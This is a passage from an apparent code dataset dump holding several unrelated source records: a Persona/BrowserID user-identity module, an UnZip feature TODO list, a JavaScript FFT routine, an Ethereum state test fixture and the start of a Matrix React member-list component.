True if email\n * address is registered with BrowserID.\n * auth: string - url to send users for auth - present if type is\n * primary.\n * prov: string - url to embed for silent provisioning - present\n * if type is secondary.\n * @param {function} [onFailure] - Called on XHR failure.\n */\n addressInfo: function(email, onComplete, onFailure) {\n function complete(info) {\n // key off of both the normalized email entered typed email so\n // that the cache is maximally effective.\n addressCache[email] = info;\n addressCache[info.email] = info;\n onComplete && onComplete(info);\n }\n\n if (addressCache[email]) {\n return complete(addressCache[email]);\n }\n\n network.addressInfo(email, User.rpInfo.getIssuer(), function(info) {\n // update the email with the normalized email if it is available.\n // The normalized email is stored in the cache.\n var normalizedEmail = info.normalizedEmail || email;\n info.email = normalizedEmail;\n User.checkForInvalidCerts(normalizedEmail, info, function(cleanedInfo) {\n if (cleanedInfo.type === \"primary\") {\n cleanedInfo.idpName = _.escape(getIdPName(cleanedInfo));\n complete(cleanedInfo);\n }\n else {\n complete(cleanedInfo);\n }\n });\n }, onFailure);\n },\n\n /**\n * Checks for outdated certificates and clears them from storage.\n * Returns original info, may have been altered\n * @param {string} email - Email address to check.\n * @param {object} info - Output from addressInfo callback\n * @param {function} done - called with object when complete.\n */\n checkForInvalidCerts: function(email, info, done) {\n function clearCert(email, idInfo) {\n delete idInfo.priv;\n delete idInfo.cert;\n delete primaryAuthCache[email];\n storage.addEmail(email, idInfo);\n }\n\n cryptoLoader.load(function(jwcrypto) {\n var record = User.getStoredEmailKeypair(email);\n\n if (!(record && record.cert)) return complete(done, info);\n\n var prevIssuer;\n try {\n prevIssuer =\n jwcrypto.extractComponents(record.cert).payload.iss;\n } catch (e) {\n // error parsing the certificate! Maybe it's of an\n // old/different format? clear cert.\n helpers.log(\"Looking for issuer, \" +\n \"error parsing cert for\"+ email +\":\" + String(e));\n clearCert(email, record);\n }\n\n // If the address is vouched for by the fallback IdP, the issuer will\n // be the fallback IdP. This takes care of addresses that are\n // beginning the transition state.\n if (info.issuer !== prevIssuer) {\n // issuer has changed... clear cert.\n clearCert(email, record);\n\n // If the issuer has changed, then silent assertions should not be\n // generated until the user verifies with the new issuer. Keep tabs\n // getSilentAssertion will handle this. If there is no prevIssuer,\n // the user has no cert, and there is no problem.\n info.issuerChange = !!prevIssuer;\n }\n else if (record.unverified && \"unverified\" !== info.state) {\n // cert was created with an unverified email but the email\n // is now verified... clear cert.\n clearCert(email, record);\n }\n else if (isTransitioning(info.state)) {\n // On a transition, issuer MUST have changed... clear cert\n clearCert(email, record);\n }\n complete(done, info);\n });\n },\n\n /**\n * Add an email address to an already created account. Sends address and\n * keypair to the server, user then needs to verify account ownership. 
This\n * does not add the new email address/keypair to the local list of\n * valid identities.\n * @method addEmail\n * @param {string} email\n * @param {string} password\n * @param {function} [onComplete] - Called on successful completion.\n * @param {function} [onFailure] - Called on error.\n */\n addEmail: function(email, password, onComplete, onFailure) {\n stageAddressVerification(email, password,\n network.addSecondaryEmail.bind(network, email, password, User.rpInfo),\n onComplete, onFailure);\n },\n\n /**\n * Check whether a password is needed to add a secondary email address to\n * an already existing account.\n * @method passwordNeededToAddSecondaryEmail\n * @param {function} [onComplete] - Called on successful completion, called\n * with true if password is needed, false otw.\n * @param {function} [onFailure] - Called on error.\n */\n passwordNeededToAddSecondaryEmail: function(onComplete, onFailure) {\n withContext(function(ctx) {\n complete(onComplete, !ctx.has_password);\n }, onFailure);\n },\n\n /**\n * Wait for the email registration to complete\n * @method waitForEmailValidation\n * @param {string} email - email address to check.\n * @param {function} [onSuccess] - Called to give status updates.\n * @param {function} [onFailure] - Called on error.\n */\n waitForEmailValidation: addressVerificationPoll.curry(network.checkEmailRegistration),\n\n /**\n * Cancel the waitForEmailValidation poll\n * @method cancelEmailValidation\n */\n cancelEmailValidation: cancelRegistrationPoll,\n\n /**\n * Verify a users email address given by the token\n * @method verifyEmail\n * @param {string} token\n * @param {string} password\n * @param {function} [onComplete] - Called on completion.\n * Called with an object with valid, email, and origin if valid, called\n * with valid=false otw.\n * @param {function} [onFailure] - Called on error.\n */\n verifyEmail: completeAddressVerification.curry(network.completeEmailRegistration),\n\n /**\n * Remove an email address.\n * @method removeEmail\n * @param {string} email - Email address to remove.\n * @param {function} [onComplete] - Called when complete.\n * @param {function} [onFailure] - Called on error.\n */\n removeEmail: function(email, onComplete, onFailure) {\n var issuer = User.rpInfo.getIssuer();\n if (storage.getEmail(email, issuer)) {\n network.removeEmail(email, function() {\n storage.removeEmail(email, issuer);\n complete(onComplete);\n }, onFailure);\n } else if (onComplete) {\n onComplete();\n }\n },\n\n /**\n * Sync an identity with the server. Creates and stores locally and on the\n * server a keypair for the given email address.\n * @method syncEmailKeypair\n * @param {string} email - Email address.\n * @param {function} [onComplete] - Called on completion. Called with\n * status parameter - true if successful, false otw.\n * @param {function} [onFailure] - Called on error.\n */\n syncEmailKeypair: function(email, onComplete, onFailure) {\n // jwcrypto depends on a random seed being set to generate a keypair.\n // The seed is set with a call to withContext. 
Ensure the\n // random seed is set before continuing or else the seed may not be set,\n // the key never created, and the onComplete callback never called.\n withContext(function() {\n cryptoLoader.load(function(jwcrypto) {\n jwcrypto.generateKeypair({algorithm: \"DS\", keysize: bid.KEY_LENGTH}, function(err, keypair) {\n certifyEmailKeypair(email, keypair, onComplete, onFailure);\n });\n });\n });\n },\n\n\n /**\n * Get an assertion for an identity, optionally backed by a specific issuer\n * @method getAssertion\n * @param {string} email - Email to get assertion for.\n * @param {string} audience - Audience to use for the assertion.\n * @param {function} [onComplete] - Called with assertion, null otw.\n * @param {function} [onFailure] - Called on error.\n */\n getAssertion: function(email, audience, onComplete, onFailure) {\n var issuer = User.rpInfo.getIssuer(),\n storedID = storage.getEmail(email, issuer),\n userAssertedClaims = User.rpInfo.getUserAssertedClaims() || {},\n assertion;\n\n function createAssertion(idInfo) {\n // we use the current time from the browserid servers\n // to avoid issues with clock drift on user's machine.\n // (issue #329)\n withContext(function(userContext, networkContext) {\n var serverTime = networkContext.getServerTime();\n cryptoLoader.load(function(jwcrypto) {\n var sk = jwcrypto.loadSecretKeyFromObject(idInfo.priv);\n\n // assertions are valid for 2 minutes\n var expirationMS = serverTime.getTime() + (2 * 60 * 1000);\n var expirationDate = new Date(expirationMS);\n\n // yield to the render thread, important on IE8 so we don't\n // raise \"script has become unresponsive\" errors.\n setTimeout(function() {\n jwcrypto.assertion.sign(\n userAssertedClaims, {audience: audience, expiresAt: expirationDate},\n sk,\n function(err, signedAssertion) {\n assertion = jwcrypto.cert.bundle([idInfo.cert], signedAssertion);\n storage.site.set(audience, \"email\", email);\n // issuer is used for B2G to get silent assertions to get\n // assertions backed by certs from a special issuer.\n storage.site.set(audience, \"issuer\", issuer);\n\n /**\n * If a user who signs with a primary address is not authenticated to Persona,\n * an assertion is first generated with the audience login.persona.org to sign the user\n * into Persona, another assertion is generated to sign the user into the RP. 
The cert should\n * be removed after generating the assertion for the RP.\n */\n if (audience !== PERSONA_ORG_AUDIENCE && !storage.usersComputer.confirmed(email)) {\n // If the user has not confirmed that this is their\n // computer, immediately invalidate the cert so that nobody\n // else can sign in using this address.\n storage.invalidateEmail(email);\n }\n complete(onComplete, assertion);\n });\n }, 0);\n });\n }, onFailure);\n }\n\n if (storedID) {\n if (storedID.priv) {\n // parse the secret key\n // yield to the render thread!\n setTimeout(function() {\n createAssertion(storedID);\n }, 0);\n }\n else {\n User.addressInfo(email, function(info) {\n if (info.type === \"primary\" && User.rpInfo.isDefaultIssuer()) {\n // first we have to get the address info, then attempt\n // a provision, then if the user is provisioned, go and get an\n // assertion.\n User.provisionPrimaryUser(email, info, function(status) {\n if (status === \"primary.verified\") {\n User.getAssertion(email, audience, onComplete, onFailure);\n }\n else {\n complete(onComplete, null);\n }\n }, onFailure);\n }\n else {\n // we have no key for this identity, go generate the key,\n // sync it and then get the assertion recursively.\n User.syncEmailKeypair(email, function(status) {\n User.getAssertion(email, audience, onComplete, onFailure);\n }, onFailure);\n }\n }, onFailure);\n }\n }\n else {\n complete(onComplete, null);\n }\n },\n\n /**\n * Get the list of identities stored locally.\n * @method getStoredEmailKeypairs\n * @return {object} identities.\n */\n getStoredEmailKeypairs: function() {\n return storage.getEmails(User.rpInfo.getIssuer());\n },\n\n /**\n * Get the list of identities sorted by address.\n * @method getSortedEmailKeypairs\n * @return {array} of objects, with two fields, address, data\n */\n getSortedEmailKeypairs: function() {\n var identities = User.getStoredEmailKeypairs(),\n sortedIdentities = [];\n\n for(var key in identities) {\n if (identities.hasOwnProperty(key)) {\n sortedIdentities.push({ address: key, info: identities[key] });\n }\n }\n\n sortedIdentities.sort(function(a, b) {\n var retval = a.address > b.address ? 1 : a.address < b.address ? -1 : 0;\n return retval;\n });\n\n return sortedIdentities;\n },\n\n /**\n * Get an individual stored identity.\n * @method getStoredEmailKeypair\n * @return {object} identity information for email, if exists, undefined\n * otw.\n */\n getStoredEmailKeypair: function(email) {\n return storage.getEmail(email, User.rpInfo.getIssuer());\n },\n\n /**\n * Clear the list of identities stored locally.\n * @method clearStoredEmailKeypairs\n */\n clearStoredEmailKeypairs: function() {\n storage.clear();\n },\n\n /**\n * Get an assertion for the current domain if the user is signed into it\n * @method getSilentAssertion\n * @param {function} onComplete - called on completion. Called with an\n * an email and assertion if successful, null otw.\n * @param {function} onFailure - called on XHR failure.\n */\n getSilentAssertion: function(siteSpecifiedEmail, onComplete, onFailure) {\n /**\n * Here is everything I know about silent assertions.\n *\n * getSilentAssertion is used in both the communication_iframe and the\n * internal_api to get assertions. 
Silent assertions drive the .watch\n * API which in turn drives .get and .getVerifiedEmail.\n *\n * Silent assertions are supposed to be fetched under the following\n * conditions (AND):\n * 1) The user is signed in to Persona.\n * 2) Persona believes the user is signed in to the current site.\n * 3) The address in #2 is different to siteSpecifiedEmail. If the\n * addresses are the same, call onComplete with (email, null) to\n * specify \"we agree with you\"\n * 4) The address in #2 is not in a transition state. If the address is\n * in a transition state, the user must go to the dialog to see\n * messaging and possibly verify their email address.\n * 5) A cert must exist or be able to be created for the address in #2.\n * If a cert does not currently exist, try to fetch one from the\n * backing IdP. This allows an assertion to be generated for two\n * scenarios: a) a cert has expired but the IdP allows the user\n * to create one. b) a cert does not exist, but the IdP allows\n * the user to create one. Case b is used with\n * post-verification redirect and the .watch API.\n *\n * If any of the conditions are not met, call onComplete with a null\n * assertion.\n *\n * There are 3 transition states:\n * 1) transition_to_primary - an address that is marked as a \"secondary\"\n * is now backed by a primary IdP. The user should see messaging\n * that says they will authenticate with the IdP instead of\n * Persona.\n * 2) transition_to_secondary - an address that is marked as a \"primary\"\n * no longer has primary IdP backing. It must be vouched for by\n * the fallback IdP. The user already has a Persona password.\n * The user should see messaging that explains to them they use\n * their Persona password, they then type their Persona password\n * and verify their ownership of the address via an email\n * verification.\n * 3) transition_no_password - an address that is marked as a \"primary\"\n * no longer has primary IdP backing. It must be vouched for by\n * the fallback IdP. The user must set a Persona password. The user\n * should see messaging that explains to them they use their\n * Persona password for this address. The user sets a new password\n * and must verify their email address.\n *\n * In any transition state, the user has to see some messaging and\n * possibly verify their email address. No assertion should be generated.\n */\n var rpInfo = User.rpInfo;\n User.checkAuthenticationAndSync(function(authenticated) {\n var origin = rpInfo.getOrigin();\n var loggedInEmail = storage.site.get(origin, \"logged_in\");\n if (!loggedInEmail) {\n loggedInEmail = storage.site.get(origin, \"one_time\");\n }\n // User is not signed in to Persona or not signed into the site.\n if (!(authenticated && loggedInEmail))\n return complete(onComplete, null, null);\n\n User.resetCaches();\n User.addressInfo(loggedInEmail, function(info) {\n // If the address is in a transition state, the user must see\n // messaging in the dialog before continuing.\n if (isTransitioning(info.state))\n return complete(onComplete, null, null);\n\n // If there has not been an issuer change and Persona's view of the\n // world agrees with the sites, then skip assertion generation.\n if (( ! info.issuerChange)\n && (loggedInEmail === siteSpecifiedEmail)) {\n return complete(onComplete, loggedInEmail, null);\n }\n\n // Try to fetch an assertion. 
If a cert for the address exists or\n // if one can be signed by the backing IdP, an assertion will be\n // generated.\n // If there has been an issuer change, this will check with the new\n // issuer to make sure the user is authenticated there.\n User.getAssertion(loggedInEmail, origin, function(assertion) {\n if (assertion) {\n storage.site.remove(origin, \"one_time\");\n }\n complete(onComplete, assertion ? loggedInEmail : null, assertion);\n }, onFailure);\n });\n }, onFailure);\n },\n\n /**\n * Clear the persistent signin field for the current origin\n * @method logout\n * @param {function} onComplete - called on completion. Called with\n * a boolean, true if successful, false otw.\n * @param {function} onFailure - called on XHR failure.\n */\n logout: function(onComplete, onFailure) {\n var rpInfo = User.rpInfo;\n User.checkAuthentication(function(authenticated) {\n if (authenticated) {\n storage.site.remove(rpInfo.getOrigin(), \"logged_in\");\n }\n\n if (onComplete) {\n onComplete(!!authenticated);\n }\n }, onFailure);\n },\n\n /**\n * Set whether the user owns the computer or not.\n * @method setComputerOwnershipStatus\n * @param {boolean} userOwnsComputer - true if user owns computer, false otw.\n * @param {function} onComplete - called on successful completion.\n * @param {function} onFailure - called on XHR failure.\n */\n setComputerOwnershipStatus: function(userOwnsComputer, onComplete, onFailure) {\n withContext(function(context) {\n if (context.isUserAuthenticated()) {\n if (userOwnsComputer) {\n storage.usersComputer.setConfirmed(context.getUserId());\n network.prolongSession(onComplete, onFailure);\n }\n else {\n storage.usersComputer.setDenied(context.getUserId());\n complete(onComplete);\n }\n } else {\n complete(onFailure, \"user is not authenticated\");\n }\n }, onFailure);\n },\n\n /**\n * Check if the user owns the computer\n * @method isUsersComputer\n */\n isUsersComputer: function(onComplete, onFailure) {\n withContext(function(context) {\n if (context.isUserAuthenticated()) {\n complete(onComplete, storage.usersComputer.confirmed(context.getUserId()));\n } else {\n complete(onFailure, \"user is not authenticated\");\n }\n }, onFailure);\n },\n\n /**\n * Check whether the user should be asked if this is their computer\n * @method shouldAskIfUsersComputer\n */\n shouldAskIfUsersComputer: function(onComplete, onFailure) {\n withContext(function(context) {\n if (context.isUserAuthenticated()) {\n // A user should never be asked if they completed an email\n // registration/validation in this dialog session.\n var shouldAsk = storage.usersComputer.shouldAsk(context.getUserId())\n && !registrationComplete;\n complete(onComplete, shouldAsk);\n } else {\n complete(onFailure, \"user is not authenticated\");\n }\n }, onFailure);\n },\n\n /**\n * Mark the transition state of this user as having been completed.\n * @method usedAddressAsPrimary\n */\n usedAddressAsPrimary: function(email, onComplete, onFailure) {\n User.checkAuthentication(function(authenticated) {\n if (authenticated) {\n network.usedAddressAsPrimary(email, onComplete, onFailure);\n }\n else complete(onFailure, \"user is not authenticated\");\n }, onFailure);\n }\n };\n\n return User;\n}());\n"} {"text": "================================\nFor UnZip 6.0/6.1/who knows:\n================================\n\n o implement handling of file sizes beyond the 32-bit limit of\n 2GByte (resp. 
4GByte), using the new 64-bit extra field extensions\n as defined by PKWARE (this will not get implemented for the present\n 16-bit ports - plain DOS and OS/2 1.x)\n\n top of the list for 6.0!\n\n o add multi-part zipfile handling\n\n major feature for 6.0!\n\n o add new low-level, binary API; rewrite \"normal\" (command-line) UnZip\n to use it\n\n very soon (maybe 6.1)\n\n o use (simple!) configure script in combination with Unix Makefile\n\n very soon (6.0 or 6.1)\n\n o add precautions against extracting files outside the tree below\n the current directory resp. the specified extraction folder.\n (automatically remove absolute path specs from zip entries; emit\n warnings when traversing outside the extraction tree...)\n\n o MSDOS/WIN32/others: detection of \"reserved\" names (= names of character\n devices, or system extensions that look like a characters device driver)\n at runtime; with the goal of emitting \"meaningful\" error messages and/or\n rename queries.\n (Currently, these reserved names are catched as \"non-deletable files\".\n On MSDOS and WIN32, when the RTL stat() function allows to identify\n character devices, the \"reserved\" names are automatically prefixed with\n an underscore.)\n\n o redesign \"file exists -- is newer/older -- overwrite/skip/rename\"\n logic in extract.c and the corresponding system specific mapname()\n services; to prevent superfluous decryption key prompts for entry\n that will be skipped, later.\n\n o rewrite to use fread/fseek/etc. [eventually: test\n write(bytes) vs. fwrite(words), especially on Crays/Alphas]\n\n soon (probably in conjunction with multi-part handling)\n\n o incorporate new backfill version of inflate()\n\n wait for zlib version\n\n o check NEXTBYTE for EOF in crypt.c, funzip.c and explode.c, too\n\n whenever\n\n o add option to force completely non-interactive operation (no queries\n for overwrite/rename, password, etc.); also allow some sort of non-\n interactive password provision? (file? command-line? env. variable?)\n\n someday?\n\n o add testing of extra fields (if have CRC)\n\n later\n\n o rewrite to allow use as a filter\n\n way, way later...\n\n o add Unix hard-link support?\n\n way, way later...\n\n o add \".ini\" file support as a (more elaborate) alternative to the presently\n supported preconfiguring abilities via special environment variables\n (UNZIP on many systems...)?\n\n way, way later (if ever)...\n\n o add option to search zipfile contents for a string and print the\n results? (\"zipgrep\" option--e.g., unzip -g or unzip -S) (easy for\n fixed strings, hard for wildcards/true regex's)\n\n way, way later, if at all...probably use libregex\n\n o add -y \"display symlinks\" option to zipinfo? various sorting options?\n (-St date/time, -Sn name)?\n\n who knows\n\n o add \"in-depth\" option to zipinfo? 
(check local headers against\n central, etc.)--make it a better debugging tool (or just create\n zipfix)\n\n who knows (zip -F, -FF already exist)\n\nSome maintenance or OS specific topics for 6.0 release:\n\n * add \"unix-style-path -> partitioned-dataset filename\" conversion\n to MVS port\n\n * should we add support for (null) entry names (empty entry name field), to\n conform to the PKWARE specification?\n\n\n=======================================\n\nRequested features:\n\n - extract or exclude on basis of UID [Armin Bub, Armin.Bub@bk.bosch.de, 970904]\n\n=======================================\n\n o miscellaneous little stuff: whenever\n --------------------------\n\n - add support for setting directory time stamps to win32 port. This requires\n a solution similar to the UNIX SET_DIR_ATTRIB optional code; maybe, it could\n be combined with the delayed restoring of directory ACLs. Unfortunately,\n the simple version used in the OS/2 case (setting dir time stamp just after\n creating the directory) does not work, because WinNT updates directory\n change times whenever the directory content gets modified (addition,\n deletion, rename, file change), at least for NTFS file systems.\n (SPC, 2000-11-16)\n\n - change DOS -f/-u stuff to use DOS API for getting filetimes, not stat()\n\n - add (-N?) option to lose all user input and/or switch to \"(*input)()\"\n function, replaceable by UzpAltMain() param\n - add -@ option to read from stdin (zip) or from file (PKZIP)? (go32 built-in)\n - add -oo option to overwrite OS/2 and DOS system and hidden files, too\n - add option to compute MD5 checksum on files and/or on entire zipfile?\n\n - decide whether to use WinGUI \"skipping\" diagnostics in extract.c\n - combine \"y/n/A/N\" query/response stuff into unified section with query\n function(s) (InputFn?)\n - disable ^V code in remaining mapname() routines\n\n - change filename-matching logic so case-insensitive if case-sensitive fails?\n\n - allow multiple dir creation with -d option? [Bob Maynard]\n\n - use gcc -pg, gprof to do profiling on unzip\n\n - Doug Patriarche (doug.patriarche.bvdhp01@nt.com) Northern Telecom Canada Ltd.\n \"I need to do a port of zip/unzip for Wind River Systems' VxWorks OS\"\n [GRR: 15 March 95 -> \"early June\"]\n\n\nFeatures from old BUGS file (mostly duplicates of other entries above):\n\n - ignore case for internal filename match on non-Unix systems, unless file-\n specs enclosed in single quotes\n - modify to decompress input stream if part of a pipe, but continue using\n central directory if not (BIG job!)--extended local header capability\n - add zipinfo option(s) to sort alphabetically, by date/time, in reverse, etc.\n - when listing filenames, use '?' for non-printables? [Thomas Wolff, 92.6.1]\n - add zipinfo \"in-depth\" option? (check local vs. central filenames, etc.)\n - create zipcat program to concatenate zipfiles\n - add -oo option (overwrite and override)? no user queries (if bad password,\n skip file; if disk full, take default action; if VMS special on non-VMS,\n unpack anyway; etc.)\n - add -Q[Q[Q]] option (quiet mode on comments, cautions, warnings and errors)?\n forget -oo, or make synonym? Default level -Q?\n"} {"text": "/*\r\n时域转频域,快速傅里叶变换(FFT)\r\nhttps://github.com/xiangyuecn/Recorder\r\n\r\nvar fft=Recorder.LibFFT(bufferSize)\r\n\tbufferSize取值2的n次方\r\n\r\nfft.bufferSize 实际采用的bufferSize\r\nfft.transform(inBuffer)\r\n\tinBuffer:[Int16,...] 
数组长度必须是bufferSize\r\n\t返回[Float64(Long),...],长度为bufferSize/2\r\n*/\r\n\r\n/*\r\n从FFT.java 移植,Java开源库:jmp123 版本0.3\r\nhttps://www.iteye.com/topic/851459\r\nhttps://sourceforge.net/projects/jmp123/files/\r\n*/\r\nRecorder.LibFFT=function(bufferSize){\r\n\t\"use strict\";\r\n\t\r\n\tvar FFT_N_LOG,FFT_N,MINY;\r\n\tvar real, imag, sintable, costable;\r\n\tvar bitReverse;\r\n\r\n\tvar FFT_Fn=function(bufferSize) {//bufferSize只能取值2的n次方\r\n\t\tFFT_N_LOG=Math.round(Math.log(bufferSize)/Math.log(2));\r\n\t\tFFT_N = 1 << FFT_N_LOG;\r\n\t\tMINY = ((FFT_N << 2) * Math.sqrt(2));\r\n\t\t\r\n\t\treal = [];\r\n\t\timag = [];\r\n\t\tsintable = [0];\r\n\t\tcostable = [0];\r\n\t\tbitReverse = [];\r\n\r\n\t\tvar i, j, k, reve;\r\n\t\tfor (i = 0; i < FFT_N; i++) {\r\n\t\t\tk = i;\r\n\t\t\tfor (j = 0, reve = 0; j != FFT_N_LOG; j++) {\r\n\t\t\t\treve <<= 1;\r\n\t\t\t\treve |= (k & 1);\r\n\t\t\t\tk >>>= 1;\r\n\t\t\t}\r\n\t\t\tbitReverse[i] = reve;\r\n\t\t}\r\n\r\n\t\tvar theta, dt = 2 * Math.PI / FFT_N;\r\n\t\tfor (i = (FFT_N >> 1) - 1; i > 0; i--) {\r\n\t\t\ttheta = i * dt;\r\n\t\t\tcostable[i] = Math.cos(theta);\r\n\t\t\tsintable[i] = Math.sin(theta);\r\n\t\t}\r\n\t}\r\n\r\n\t/*\r\n\t用于频谱显示的快速傅里叶变换 \r\n inBuffer 输入FFT_N个实数,返回 FFT_N/2个输出值(复数模的平方)。 \r\n\t*/\r\n\tvar getModulus=function(inBuffer) {\r\n\t\tvar i, j, k, ir, j0 = 1, idx = FFT_N_LOG - 1;\r\n\t\tvar cosv, sinv, tmpr, tmpi;\r\n\t\tfor (i = 0; i != FFT_N; i++) {\r\n\t\t\treal[i] = inBuffer[bitReverse[i]];\r\n\t\t\timag[i] = 0;\r\n\t\t}\r\n\r\n\t\tfor (i = FFT_N_LOG; i != 0; i--) {\r\n\t\t\tfor (j = 0; j != j0; j++) {\r\n\t\t\t\tcosv = costable[j << idx];\r\n\t\t\t\tsinv = sintable[j << idx];\r\n\t\t\t\tfor (k = j; k < FFT_N; k += j0 << 1) {\r\n\t\t\t\t\tir = k + j0;\r\n\t\t\t\t\ttmpr = cosv * real[ir] - sinv * imag[ir];\r\n\t\t\t\t\ttmpi = cosv * imag[ir] + sinv * real[ir];\r\n\t\t\t\t\treal[ir] = real[k] - tmpr;\r\n\t\t\t\t\timag[ir] = imag[k] - tmpi;\r\n\t\t\t\t\treal[k] += tmpr;\r\n\t\t\t\t\timag[k] += tmpi;\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\tj0 <<= 1;\r\n\t\t\tidx--;\r\n\t\t}\r\n\r\n\t\tj = FFT_N >> 1;\r\n\t\tvar outBuffer=new Float64Array(j);\r\n\t\t/*\r\n\t\t * 输出模的平方:\r\n\t\t * for(i = 1; i <= j; i++)\r\n\t\t * \tinBuffer[i-1] = real[i] * real[i] + imag[i] * imag[i];\r\n\t\t * \r\n\t\t * 如果FFT只用于频谱显示,可以\"淘汰\"幅值较小的而减少浮点乘法运算. 
MINY的值\r\n\t\t * 和Spectrum.Y0,Spectrum.logY0对应.\r\n\t\t */\r\n\t\tsinv = MINY;\r\n\t\tcosv = -MINY;\r\n\t\tfor (i = j; i != 0; i--) {\r\n\t\t\ttmpr = real[i];\r\n\t\t\ttmpi = imag[i];\r\n\t\t\tif (tmpr > cosv && tmpr < sinv && tmpi > cosv && tmpi < sinv)\r\n\t\t\t\toutBuffer[i - 1] = 0;\r\n\t\t\telse\r\n\t\t\t\toutBuffer[i - 1] = Math.round(tmpr * tmpr + tmpi * tmpi);\r\n\t\t}\r\n\t\treturn outBuffer;\r\n\t}\r\n\t\r\n\tFFT_Fn(bufferSize);\r\n\treturn {transform:getModulus,bufferSize:FFT_N};\r\n};\r\n"} {"text": "{\n \"callcallcallcode_ABCB_RECURSIVE\" : {\n \"_info\" : {\n \"comment\" : \"\",\n \"filledwith\" : \"testeth 1.6.0-alpha.0-11+commit.978e68d2\",\n \"lllcversion\" : \"Version: 0.5.0-develop.2018.11.9+commit.9709dfe0.Linux.g++\",\n \"source\" : \"src/GeneralStateTestsFiller/stCallCodes/callcallcallcode_ABCB_RECURSIVEFiller.json\",\n \"sourceHash\" : \"a4d748d448f89fa8b97452061e741e6023c3be55d99a8116dd0641a7502532ad\"\n },\n \"env\" : {\n \"currentCoinbase\" : \"0x2adc25665018aa1fe0e6bc666dac8fc2697ff9ba\",\n \"currentDifficulty\" : \"0x20000\",\n \"currentGasLimit\" : \"0xb2d05e00\",\n \"currentNumber\" : \"0x01\",\n \"currentTimestamp\" : \"0x03e8\",\n \"previousHash\" : \"0x5e20a0453cecd065ea59c37ac63e079ee08998b6045136a8ce6635c7912ec0b6\"\n },\n \"post\" : {\n \"Byzantium\" : [\n {\n \"hash\" : \"0xd60f0feab4578b9374bf7263fe10d917b70201b56524b1b0f5543abd16635e7d\",\n \"indexes\" : {\n \"data\" : 0,\n \"gas\" : 0,\n \"value\" : 0\n },\n \"logs\" : \"0x1dcc4de8dec75d7aab85b567b6ccd41ad312451b948a7413f0a142fd40d49347\"\n }\n ],\n \"Constantinople\" : [\n {\n \"hash\" : \"0x6a331b0e0d31baa1b8fe27d9ae7a63a00948a560d1592bf2e905c6fe005a8271\",\n \"indexes\" : {\n \"data\" : 0,\n \"gas\" : 0,\n \"value\" : 0\n },\n \"logs\" : \"0x1dcc4de8dec75d7aab85b567b6ccd41ad312451b948a7413f0a142fd40d49347\"\n }\n ],\n \"ConstantinopleFix\" : [\n {\n \"hash\" : \"0xd60f0feab4578b9374bf7263fe10d917b70201b56524b1b0f5543abd16635e7d\",\n \"indexes\" : {\n \"data\" : 0,\n \"gas\" : 0,\n \"value\" : 0\n },\n \"logs\" : \"0x1dcc4de8dec75d7aab85b567b6ccd41ad312451b948a7413f0a142fd40d49347\"\n }\n ],\n \"Frontier\" : [\n {\n \"hash\" : \"0x5cfc164fa79f7a1ed6e4c96e479a96efdb50a7c14eb59af4016b1f0de169504e\",\n \"indexes\" : {\n \"data\" : 0,\n \"gas\" : 0,\n \"value\" : 0\n },\n \"logs\" : \"0x1dcc4de8dec75d7aab85b567b6ccd41ad312451b948a7413f0a142fd40d49347\"\n }\n ]\n },\n \"pre\" : {\n \"0x1000000000000000000000000000000000000000\" : {\n \"balance\" : \"0x0de0b6b3a7640000\",\n \"code\" : \"0x6040600060406000600073100000000000000000000000000000000000000163017d7840f1600055\",\n \"nonce\" : \"0x00\",\n \"storage\" : {\n }\n },\n \"0x1000000000000000000000000000000000000001\" : {\n \"balance\" : \"0x02540be400\",\n \"code\" : \"0x60406000604060006000731000000000000000000000000000000000000002620f4240f1600155\",\n \"nonce\" : \"0x00\",\n \"storage\" : {\n }\n },\n \"0x1000000000000000000000000000000000000002\" : {\n \"balance\" : \"0x02540be400\",\n \"code\" : \"0x604060006040600060007310000000000000000000000000000000000000016207a120f2600255\",\n \"nonce\" : \"0x00\",\n \"storage\" : {\n }\n },\n \"0xa94f5374fce5edbc8e2a8697c15331677e6ebf0b\" : {\n \"balance\" : \"0x0de0b6b3a7640000\",\n \"code\" : \"\",\n \"nonce\" : \"0x00\",\n \"storage\" : {\n }\n }\n },\n \"transaction\" : {\n \"data\" : [\n \"0x\"\n ],\n \"gasLimit\" : [\n \"0x01c9c380\"\n ],\n \"gasPrice\" : \"0x01\",\n \"nonce\" : \"0x00\",\n \"secretKey\" : \"0x45a915e4d060149eb4365960e6a7a45f334393093061116b197e3240065ff2d8\",\n \"to\" : 
\"0x1000000000000000000000000000000000000000\",\n \"value\" : [\n \"0x00\"\n ]\n }\n }\n}"} {"text": "/*\nCopyright 2015, 2016 OpenMarket Ltd\nCopyright 2017 Vector Creations Ltd\nCopyright 2017, 2018 New Vector Ltd\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n*/\n\nimport React from 'react';\nimport { _t } from '../../../languageHandler';\nimport SdkConfig from '../../../SdkConfig';\nimport dis from '../../../dispatcher/dispatcher';\nimport {isValid3pidInvite} from \"../../../RoomInvite\";\nimport rate_limited_func from \"../../../ratelimitedfunc\";\nimport {MatrixClientPeg} from \"../../../MatrixClientPeg\";\nimport * as sdk from \"../../../index\";\nimport {CommunityPrototypeStore} from \"../../../stores/CommunityPrototypeStore\";\nimport BaseCard from \"../right_panel/BaseCard\";\nimport {RightPanelPhases} from \"../../../stores/RightPanelStorePhases\";\n\nconst INITIAL_LOAD_NUM_MEMBERS = 30;\nconst INITIAL_LOAD_NUM_INVITED = 5;\nconst SHOW_MORE_INCREMENT = 100;\n\n// Regex applied to filter our punctuation in member names before applying sort, to fuzzy it a little\n// matches all ASCII punctuation: !\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~\nconst SORT_REGEX = /[\\x21-\\x2F\\x3A-\\x40\\x5B-\\x60\\x7B-\\x7E]+/g;\n\nexport default class MemberList extends React.Component {\n constructor(props) {\n super(props);\n\n const cli = MatrixClientPeg.get();\n if (cli.hasLazyLoadMembersEnabled()) {\n // show an empty list\n this.state = this._getMembersState([]);\n } else {\n this.state = this._getMembersState(this.roomMembers());\n }\n\n cli.on(\"Room\", this.onRoom); // invites & joining after peek\n const enablePresenceByHsUrl = SdkConfig.get()[\"enable_presence_by_hs_url\"];\n const hsUrl = 